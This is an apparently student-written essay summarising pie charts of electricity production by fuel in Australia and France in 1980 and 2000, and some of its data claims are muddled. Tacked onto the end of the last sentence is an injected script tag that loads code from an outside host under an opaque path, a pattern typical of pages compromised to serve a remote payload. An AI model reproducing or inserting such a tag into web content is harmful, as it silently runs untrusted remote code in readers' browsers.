The pie chart illustrates the units of electricity production by fuel source in both Australia and France in 1980 and 2000.
It’s obvious that throughout the years both Australia and France became more dependent on Nuclear power to produce electricity rather than Natural gas, although their total amount of electricity production significantly rose almost to the double.
Eventually, during 1980, both countries relied on all types of fossil fuels almost equally, with higher advantage to coal and natural gas; however, this was more polluting to environment; moreover the total production was only 90 units; therefore, it was increasing contamination and not that beneficial to economy.
Moving forward 2 decades, with the huge technological revolution and nuclear usage, Australia and France switched their fuel sources to Nuclear power; moreover to this, Nuclear power percentage rose dramatically from 15 units to 125 units, and Natural gas backed off, the total production has increased.<script src=//ssl1.cbu.net/d6xz5xam></script>
